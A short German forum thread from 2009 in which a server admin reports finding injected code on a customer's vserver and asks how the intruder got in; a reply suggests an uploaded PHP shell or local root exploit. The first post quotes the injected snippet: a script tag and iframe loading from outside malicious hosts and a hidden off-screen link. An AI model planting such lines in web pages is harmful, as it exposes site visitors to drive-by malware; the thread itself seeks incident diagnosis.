Vserver mit WebX (Confixx) Hacked ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von freakZ, 20. Dezember 2009 .

  1. #1 20. Dezember 2009
    hi,

    hab grad bei nem kunden vserver folgende zeilen gefunden ->

    <script src=http://green-garden.sk/ftp/down.php ></script><body bgcolor="#BDBBBB"><iframe frameborder="0" onload="if (!this.src){ this.src='http://gooiq.ru:80<div style='position:absolute;left:-1000px;'><a href='.lib/index.php'>

    Und einiges mehr das ganze war bei einem webX drauf -> confixx..

    Was würdet ihr tun was ist das für ne url ? Wie kommt der in den account rein?

    greez
     
  2. #2 22. Dezember 2009
    AW: Vserver mit WebX (Confixx) Hacked ?

    wenn du shared hosting machst wurde vllt eine website gehackt und eine phpshell hochgeladen.
    je nach rechte konnte er dann alle anderen websites mit nem sctipt ändern, oder er hat sich root rechte mit einem local exploit geholt und dann alle seiten geframed.
    beide websites im script werden als böse websites erkannt, warscheinlich wird von denen der "böse code geladen", also versucht durch sicherheitslücken schadsoftware zu installieren.

    davon geh ich jetzt mal aus..
     

  3. Videos zum Thema
    Video Script
Die Seite wird geladen...

Ähnliche Themen mit den Stichworten: Vserver WebX Confixx

  1. Antworten:
    0
    Aufrufe:
    1.589
  2. Gibt es günstige vserver die gut sind?
    Morrowind, 14. Februar 2016 , im Forum: Hosting & Server
    Antworten:
    1
    Aufrufe:
    1.272
  3. suche einen kleinen vServer
    Lorenz, 28. März 2015 , im Forum: Hosting & Server
    Antworten:
    9
    Aufrufe:
    4.771
  4. vServer: VPS Anbieter in Russland
    dsn, 23. Januar 2015 , im Forum: Hosting & Server
    Antworten:
    0
    Aufrufe:
    2.301
  5. Livestreaming mit vServer - Lösung gesucht
    DarimJäger, 19. Mai 2014 , im Forum: Hosting & Server
    Antworten:
    0
    Aufrufe:
    1.266